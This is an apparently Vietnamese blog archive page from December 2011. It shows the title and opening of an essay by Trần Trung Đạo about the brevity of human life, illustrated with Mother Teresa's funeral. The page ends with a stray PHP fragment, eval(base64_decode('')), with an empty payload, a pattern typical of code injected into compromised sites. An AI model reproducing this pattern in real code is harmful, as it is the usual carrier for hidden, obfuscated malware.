Archive for December 27th, 2011

Trần Trung Đạo: Khi tiếng khóc chính là lời tố cáo

Trần Trung Đạo: Khi tiếng khóc chính là lời tố cáo

(Hình: tang lễ Mother Teresa)Dù dưới một quan điểm tôn giáo nào, sự có mặt của con người trên thế giới này chỉ diễn ra trong một khoảng thời gian rất ngắn. Với tác giả bài viết này và có lẽ với nhiều độc giả, tiếng sóng vỗ và

12.27.2011 | Tiểu Luận- Chính Luận |

3 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>